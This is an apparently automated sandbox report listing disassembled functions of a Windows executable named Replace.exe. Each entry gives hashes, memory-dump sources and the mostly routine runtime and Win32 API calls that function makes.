                                                                                                                                                                                                              • Opcode ID: bdfae7e78cc4344e88ec60d9e2ddd2f725764665496e2c425a25bc36bbe30783
                                                                                                                                                                                                              • Instruction ID: ad6cbe00aa7fb2ef403c10ea59b6436c4f4a7202b3181dd57dfce08ea1c2183e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdfae7e78cc4344e88ec60d9e2ddd2f725764665496e2c425a25bc36bbe30783
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A2195715206224BC316DE1DDC845B6F7D0FB89306F86826AEE819B285C769F829C7E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d90cc63b55ef834e9be2b037506950026b519ddfc119c0db8de5c85cc2953256
                                                                                                                                                                                                              • Instruction ID: 8f453bff510d62e05629d52a9ce77f6d49cb36bdd15bab1ecf01560e85946cc6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d90cc63b55ef834e9be2b037506950026b519ddfc119c0db8de5c85cc2953256
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38112B71A105310BD71AD92F8C846F677D5EBC9315F8AC3A6DC819B688DA6CFC25C2E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 508c0c16835d7cd0af089b5ca690a3cc53402b89785868abd31ce742de31e14b
                                                                                                                                                                                                              • Instruction ID: 902af3c7580fde475d60e5982b60e3bcaca6cb1a9ad7c3c9723a3646290e7170
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 508c0c16835d7cd0af089b5ca690a3cc53402b89785868abd31ce742de31e14b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F0A4B5E05219EF8B08CFADC48089EFBF5FF48214B1080AEE859E3350D730AA00CB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9178e3d3e202cc242b353f9f2b4307d72396d8a4188a379d4015bd546c8b6c8b
                                                                                                                                                                                                              • Instruction ID: b9cc5a72d47b4c950d97e6f2bc96e3b4a553e8e5ac0bdbf2e3205575c6921a4f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9178e3d3e202cc242b353f9f2b4307d72396d8a4188a379d4015bd546c8b6c8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9E08C32911278EBCB28DB88CA0498AF3FCEB44B10B1500ABF501E3250D270DE04C7D0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 00BD45C3
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD4155
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD4167
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD4179
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD418B
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD419D
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41AF
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41C1
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41D3
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41E5
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD41F7
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD4209
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD421B
                                                                                                                                                                                                                • Part of subcall function 00BD4138: _free.LIBCMT ref: 00BD422D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD45B8
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD45DA
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD45EF
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD45FA
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD461C
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD462F
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD463D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4648
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4680
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4687
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD46A4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD46BC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                              • Opcode ID: 5f70490e72530e73b2320b774cafa44797eae7745025dbd2ab47a980c8581119
                                                                                                                                                                                                              • Instruction ID: f0e9217ea5a4f02fa37416025d646fcef4b351f18418acac29a36d8cc5cc5789
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f70490e72530e73b2320b774cafa44797eae7745025dbd2ab47a980c8581119
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8315C31604601AFEB21AA78D985B96F7E8EF01310F1048EBE596D7391FF72EC808B14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?), ref: 00BB4499
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,SetDefaultDllDirectories), ref: 00BB44B9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00BB44C0
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000106), ref: 00BB44E2
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00BB44F7
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,.dll), ref: 00BB453E
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00BB454C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemVersionlstrcatlstrlen
                                                                                                                                                                                                              • String ID: .dll$SetDefaultDllDirectories$UXTHEME$kernel32.dll
                                                                                                                                                                                                              • API String ID: 532070074-1956823469
                                                                                                                                                                                                              • Opcode ID: ee4304279c61602bef03ca50188f696debc3e68945a3bcda59ddd9cdb11bb87d
                                                                                                                                                                                                              • Instruction ID: b2b80ea13b75ec7269b693b905b691d7cab21d336fbb4a4aa7c1cb297de85093
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee4304279c61602bef03ca50188f696debc3e68945a3bcda59ddd9cdb11bb87d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9221713151024A9BDB209FA8D858BEEB7E8FF14701F04049AE542E7191EFB4D658CB51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00BCF318
                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00BCF33A
                                                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00BCF449
                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00BCF51B
                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00BCF59F
                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00BCF5BA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                              • API String ID: 2123188842-393685449
                                                                                                                                                                                                              • Opcode ID: db2bf2bdeb2fac0b3bb2f1c87693baef7a984be17ba83582404e811329fc48e3
                                                                                                                                                                                                              • Instruction ID: bbba7f6afec50516a401d7e0a600cac06e5528f1cc4773483b5d6deeb2603425
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db2bf2bdeb2fac0b3bb2f1c87693baef7a984be17ba83582404e811329fc48e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52B1127190020AEBCF29DFA4C981EAEBBF6FF54310B1441EEE9156B212D731DA51CB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00BB7F32
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BB7F3E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00BB7F41
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32 ref: 00BB7F48
                                                                                                                                                                                                              • MessageBoxW.USER32(?,Are you sure you want to cancel?,?,00000003), ref: 00BB7F5F
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00BB7F72
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BB7F78
                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00BB7F9A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Are you sure you want to cancel?, xrefs: 00BB7F57
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$DialogMessage
                                                                                                                                                                                                              • String ID: Are you sure you want to cancel?
                                                                                                                                                                                                              • API String ID: 2225717242-577246718
                                                                                                                                                                                                              • Opcode ID: 2191eed79d172634fd41aa334c9595e03079619263811334f5e5b05144bf27f8
                                                                                                                                                                                                              • Instruction ID: a7885743aeceb53a4dcbdf912f99ba97128b68c6e3abbaa995c4d161742efd05
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2191eed79d172634fd41aa334c9595e03079619263811334f5e5b05144bf27f8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E11BF3114C288EFC710AF29DC48F6AFFE9EF95314F05048EF48497261CBA1A814CB65
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E71
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E7D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E88
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E93
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1E9E
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1EA9
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1EB4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1EBF
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1ECA
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1ED8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BB1006
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindFirstStreamW), ref: 00BB1014
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FindNextStreamW), ref: 00BB1025
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                              • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll$ u
                                                                                                                                                                                                              • API String ID: 667068680-3382339687
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00BCDBA7
                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00BCDBAF
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00BCDC38
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00BCDC63
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00BCDCB8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD429F: _free.LIBCMT ref: 00BD42C4
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4325
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4330
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD433B
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD438F
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD439A
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD43A5
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD43B0
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00BD61FF
                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00BD63E4
                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00BD6401
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6449
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00BD6489
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6531
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1735259414-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00BCEEDB,00BCDB17,00BCCB7A), ref: 00BCEEF2
                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BCEF00
                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BCEF19
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00BCEEDB,00BCDB17,00BCCB7A), ref: 00BCEF6B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Users\user\Desktop\Replace.exe, xrefs: 00BD30A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                              • API String ID: 0-2253954093
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00BD0013,?,?,00BE76BC,00000000,?,00BD013E,00000004,InitializeCriticalSectionEx,00BDBDDC,InitializeCriticalSectionEx,00000000), ref: 00BCFFE2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                              • API String ID: 3664257935-2084034818
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00BD0FC8,?,?,00BD0F90,?,?,?), ref: 00BD0FEB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD0FFE
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00BD0FC8,?,?,00BD0F90,?,?,?), ref: 00BD1021
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
